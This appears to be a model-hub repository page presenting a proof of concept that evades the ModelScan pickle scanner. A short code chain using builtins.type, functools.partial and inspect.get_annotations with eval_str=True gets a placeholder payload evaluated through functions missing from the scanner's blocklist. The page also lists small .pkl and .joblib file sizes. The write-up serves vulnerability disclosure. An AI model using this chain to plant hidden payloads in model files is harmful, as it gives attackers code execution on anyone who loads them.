ModelScan Bypass PoC: inspect.get_annotations() + functools.partial() + builtins.type()

This bypass uses a 4-step chain of completely unblocked standard library functions:

ns = {"__annotations__": {"x": PAYLOAD}}
cls = builtins.type("X", (), ns)                 # type โˆ‰ blocklist โœ…
p = functools.partial(get_annotations, eval_str=True)  # functools, inspect โˆ‰ blocklist โœ…
p(cls)  # โ†’ eval(PAYLOAD) โ†’ REMOTE CODE EXECUTION

Size: 214 bytes (.pkl) / 235 bytes (.joblib)

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support